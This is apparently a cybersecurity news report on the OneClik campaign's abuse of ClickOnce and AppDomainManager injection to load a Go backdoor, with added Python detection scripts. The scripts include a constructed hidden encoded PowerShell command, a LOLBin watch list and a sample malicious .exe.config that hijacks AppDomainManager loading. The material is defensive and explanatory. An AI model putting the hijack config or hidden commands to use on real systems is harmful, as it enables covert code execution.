
Cybersecurity researchers have detailed a new campaign, dubbed OneClik, that leverages Microsoft's ClickOnce software deployment technology and a bespoke Golang backdoor to compromise organizations in the energy, oil and gas sectors.
"The campaign exhibits characteristics consistent with China-affiliated threat actors, though attribution remains cautious," Trellix researchers Nico Paulo Yturriaga and Pham Duy Phuc said in a technical write-up.
"Its methods reflect a broader shift toward 'living-off-the-land' tactics, blending malicious operations with cloud and enterprise tooling to evade traditional detection mechanisms."
The phishing attacks use a .NET-based loader called OneClikNet to deploy a sophisticated Go-based backdoor codenamed RunnerBeacon, which is designed to communicate with attacker-controlled infrastructure that is hidden behind legitimate Amazon Web Services (AWS) cloud services.
ClickOnce is a Microsoft technology for installing and updating Windows-based applications with minimal user interaction; it was introduced in .NET Framework 2.0. That same convenience makes it an attractive tool for threat actors who want to execute malicious payloads without raising red flags.

As described in the MITRE ATT&CK framework, a ClickOnce application can be abused to run malicious code via the trusted Windows binary "dfsvc.exe", which is responsible for installing, launching and updating ClickOnce apps. The application is launched as a child process of "dfsvc.exe".
"Because ClickOnce applications receive only limited permissions, they do not require administrative permissions to install," MITRE explains. "In this way, adversaries may abuse ClickOnce to proxy the execution of malicious code without needing to escalate privileges."
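To make the dfsvc.exe proxy-execution pattern concrete, here is an added detection example (written for this page, not Trellix's or MITRE's code) that runs over constructed, Sysmon-Event-ID-1-style process-creation records. It flags three things: a ClickOnce manifest opened through `rundll32.exe dfshim.dll,ShOpenVerbApplication <URL>` (the way a browser hands a `.application` link to the ClickOnce runtime) whose host is not on an assumed enterprise allowlist; a living-off-the-land binary spawned as a child of dfsvc.exe; and a dfsvc.exe child whose image lives outside the ClickOnce cache under `%LOCALAPPDATA%\Apps\2.0`. The allowlist, host names, paths and command lines are all assumptions.

```python
import re
from urllib.parse import urlparse

# Constructed process-creation records in the shape of Sysmon Event ID 1
# (illustrative only, not telemetry from the OneClik campaign).
SAMPLE_EVENTS = [
    {   # 0: benign - manifest served from the company's own deployment host
        "Image": r"C:\Windows\System32\rundll32.exe",
        "CommandLine": r'"C:\Windows\System32\rundll32.exe" dfshim.dll,ShOpenVerbApplication https://deploy.corp.example/tools/Inventory.application',
        "ParentImage": r"C:\Program Files\Mozilla Firefox\firefox.exe",
    },
    {   # 1: manifest served from a look-alike "hardware analysis" site
        "Image": r"C:\Windows\System32\rundll32.exe",
        "CommandLine": r'"C:\Windows\System32\rundll32.exe" dfshim.dll,ShOpenVerbApplication http://hw-analyzer.example.net/HardwareAnalyzer.application',
        "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
    },
    {   # 2: the ClickOnce app itself, started by dfsvc.exe from the ClickOnce cache
        "Image": r"C:\Users\alice\AppData\Local\Apps\2.0\K1Q2W3E4.R5T\Y6U7I8O9.P0A\hard..tion_0000000000000000_0001.0000_1a2b3c4d5e6f7a8b\HardwareAnalyzer.exe",
        "CommandLine": r'"C:\Users\alice\AppData\Local\Apps\2.0\K1Q2W3E4.R5T\Y6U7I8O9.P0A\hard..tion_0000000000000000_0001.0000_1a2b3c4d5e6f7a8b\HardwareAnalyzer.exe"',
        "ParentImage": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe",
    },
    {   # 3: dfsvc.exe spawning a LOLBin (constructed command line)
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
        "ParentImage": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe",
    },
    {   # 4: dfsvc.exe child running from outside the ClickOnce cache
        "Image": r"C:\Users\alice\AppData\Local\Temp\svc_update.exe",
        "CommandLine": r"svc_update.exe",
        "ParentImage": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe",
    },
]

# Assumption: hosts from which the enterprise legitimately deploys ClickOnce apps.
APPROVED_MANIFEST_HOSTS = {"deploy.corp.example"}

LOLBINS = {"cmd.exe", "powershell.exe", "pwsh.exe", "rundll32.exe", "mshta.exe",
           "regsvr32.exe", "wscript.exe", "cscript.exe", "msbuild.exe", "installutil.exe"}

# ClickOnce installs applications under %LOCALAPPDATA%\Apps\2.0\<hash>\<hash>\...
CLICKONCE_CACHE = re.compile(r"\\AppData\\Local\\Apps\\2\.0\\", re.IGNORECASE)
# Browser hand-off of a .application manifest to the ClickOnce runtime.
SHOPENVERB = re.compile(r"dfshim\.dll\s*,\s*ShOpenVerbApplication\s+(\S+)", re.IGNORECASE)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return a list of finding tags for one process-creation record."""
    findings = []
    image = basename(event["Image"])
    parent = basename(event["ParentImage"])
    cmd = event.get("CommandLine", "")

    # Rule 1: manifest opened from a host that is not on the allowlist.
    match = SHOPENVERB.search(cmd)
    if image == "rundll32.exe" and match:
        host = (urlparse(match.group(1)).hostname or "").lower()
        if host not in APPROVED_MANIFEST_HOSTS:
            findings.append(f"clickonce_manifest_from_unapproved_host:{host}")

    # Rules 2 and 3: what dfsvc.exe spawns. A ClickOnce app started from the cache is
    # structurally normal, so only LOLBin children or children living elsewhere are flagged.
    if parent == "dfsvc.exe":
        if image in LOLBINS:
            findings.append(f"lolbin_child_of_dfsvc:{image}")
        elif not CLICKONCE_CACHE.search(event["Image"]):
            findings.append("dfsvc_child_outside_clickonce_cache")
    return findings


def scan(events):
    """Return (event index, finding) pairs for a batch of records."""
    return [(i, f) for i, e in enumerate(events) for f in classify(e)]


if __name__ == "__main__":
    for idx, finding in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {finding}")
```

Note the caveat built into rule 2: event 2, the ClickOnce application itself running from the cache as a child of dfsvc.exe, produces no finding, because a benign ClickOnce app looks exactly the same at that point. Detection has to rest on where the manifest came from and on what the application spawns afterwards.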
According to Trellix, the attack chain starts with a phishing email containing a link to a fake hardware analysis website that serves as the conduit for delivering a ClickOnce application, which is then executed through dfsvc.exe.
That executable is a ClickOnce loader that runs its malicious code via a technique called AppDomainManager injection, ultimately decrypting and executing shellcode in memory to load the RunnerBeacon backdoor.
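AppDomainManager injection works because the CLR loads whatever assembly an application's `<exe>.exe.config` names under `<runtime>` as the AppDomainManager (the same override can be set through the APPDOMAIN_MANAGER_ASSEMBLY and APPDOMAIN_MANAGER_TYPE environment variables), and it does so before the program's own entry point runs. The following script is an added example, not code from Trellix or from the campaign: it inspects a constructed `.exe.config` and a constructed process environment for that hijack. The assembly name `UpdateHelper`, its type name, and the empty allowlist are assumptions.

```python
import xml.etree.ElementTree as ET

# Constructed <app>.exe.config as an attacker would plant it next to a legitimate,
# signed .NET executable. "UpdateHelper" and "UpdateHelper.Bootstrap" are made-up names.
MALICIOUS_CONFIG = """<configuration>
  <runtime>
    <appDomainManagerAssembly value="UpdateHelper, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null" />
    <appDomainManagerType value="UpdateHelper.Bootstrap" />
  </runtime>
</configuration>"""

# Constructed ordinary config with no AppDomainManager override.
BENIGN_CONFIG = """<configuration>
  <startup>
    <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.8" />
  </startup>
</configuration>"""

# Assumption: the organisation's allowlist of legitimate AppDomainManager assemblies,
# mapping simple name -> expected PublicKeyToken (lower-case hex). Most estates have none.
APPROVED_MANAGERS = {}

# Environment variables the CLR consults for the same override.
ENV_HOOKS = {"APPDOMAIN_MANAGER_ASSEMBLY", "APPDOMAIN_MANAGER_TYPE"}


def parse_assembly_name(display_name):
    """Split 'Name, Version=..., Culture=..., PublicKeyToken=...' into a dict."""
    parts = [p.strip() for p in display_name.split(",")]
    info = {"Name": parts[0]}
    for part in parts[1:]:
        key, _, value = part.partition("=")
        info[key.strip()] = value.strip()
    return info


def inspect_config(xml_text):
    """Return finding tags for one application .config file."""
    findings = []
    runtime = ET.fromstring(xml_text).find("runtime")
    if runtime is None:
        return findings
    asm = runtime.find("appDomainManagerAssembly")
    typ = runtime.find("appDomainManagerType")
    if asm is None and typ is None:
        return findings                        # nothing overridden
    if asm is None or typ is None:
        return ["appdomainmanager_incomplete"]  # both are needed to take effect; still odd
    info = parse_assembly_name(asm.get("value", ""))
    name = info["Name"]
    token = info.get("PublicKeyToken", "").lower()
    if token in ("", "null"):
        # No strong name: anyone can drop a DLL with this simple name beside the exe.
        findings.append(f"appdomainmanager_unsigned_assembly:{name}")
    if APPROVED_MANAGERS.get(name) != token:
        findings.append(f"appdomainmanager_not_allowlisted:{name}:{typ.get('value')}")
    return findings


def inspect_environment(env):
    """Report any AppDomainManager override variables present in a process environment."""
    return sorted(k for k in env if k.upper() in ENV_HOOKS)


if __name__ == "__main__":
    print("malicious:", inspect_config(MALICIOUS_CONFIG))
    print("benign:   ", inspect_config(BENIGN_CONFIG))
    print("env:      ", inspect_environment({"PATH": r"C:\Windows",
                                             "APPDOMAIN_MANAGER_ASSEMBLY": "UpdateHelper",
                                             "APPDOMAIN_MANAGER_TYPE": "UpdateHelper.Bootstrap"}))
```

In practice the config check is most useful when run across directories containing signed Microsoft or vendor executables, since the whole point of the technique is to borrow a trusted host binary; a `.config` that appears next to such a binary and names an assembly the vendor never shipped is the signal.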

The Golang implant can communicate with command-and-control (C2) servers over HTTP, WebSocket, raw TCP, and SMB named pipes; perform file operations; enumerate and terminate running processes; execute shell commands; escalate privileges via token theft and impersonation; and carry out lateral movement.
The backdoor also has built-in anti-analysis capabilities to evade detection and supports network operations such as port scanning, port forwarding, and the SOCKS5 protocol to provide proxying and routing.
"RunnerBeacon's design is closely comparable to known Go-based Cobalt Strike beacons (such as the Geacon/Geacon Plus/Geacon Pro family)," the researchers said.
"Like Geacon, its command set (shell, process enumeration, file I/O, proxy, etc.) and multi-protocol C2 are very similar. These structural and functional similarities suggest that RunnerBeacon may be a fork or privately evolved variant of Geacon, adapted to suit cloud-like operations."
In March 2025 alone, three different variants, V1A, BPI-MDM, and V1D, were observed, with each iteration progressively improving its ability to fly under the radar. That said, a RunnerBeacon variant had already been identified in September 2023 at a Middle Eastern company in the oil and gas sector.
Techniques like AppDomainManager injection have previously been used by China- and North Korea-linked threat actors, but this activity has not been formally attributed to any known threat actor or group.
The development comes as QiAnXin detailed a campaign by a threat actor it tracks as APT-Q-14 that used ClickOnce applications to propagate malware by exploiting a zero-day cross-site scripting (XSS) flaw in the web version of an unnamed email platform. The vulnerability has since been patched.

The XSS flaw is triggered automatically when the victim opens the phishing email, causing the ClickOnce application to be downloaded. "The body of the phishing email comes from Yahoo News, which coincides with the victim's industry," QiAnXin said.
The intrusion sequence displays a mailbox user manual as a decoy while covertly installing a malicious Trojan on the Windows host, which collects and exfiltrates system information to a C2 server and retrieves an unknown next-stage payload.

The Chinese cybersecurity company said APT-Q-14 also targets zero-day vulnerabilities in email software for the Android platform.
QiAnXin describes APT-Q-14 as originating from Northeast Asia and notes that it overlaps with other clusters tracked as APT-Q-12 (aka Pseudo Hunter) and APT-Q-15.
Earlier this week, the Beijing-based 360 Threat Intelligence Center also revealed that DarkHotel used Bring Your Own Vulnerable Driver (BYOVD) techniques to terminate Microsoft Defender Antivirus in February 2025, as part of a phishing attack that delivered fake MSI installer packages to deploy malware.
The malware is designed to establish communication with a remote server and to download, decrypt and execute unspecified shellcode.
"In general, [the hacking group's] tactics have tended to be 'simple' in recent years. Unlike its previous use of heavyweight vulnerabilities, it employs flexible, new delivery methods and attack techniques," the company said.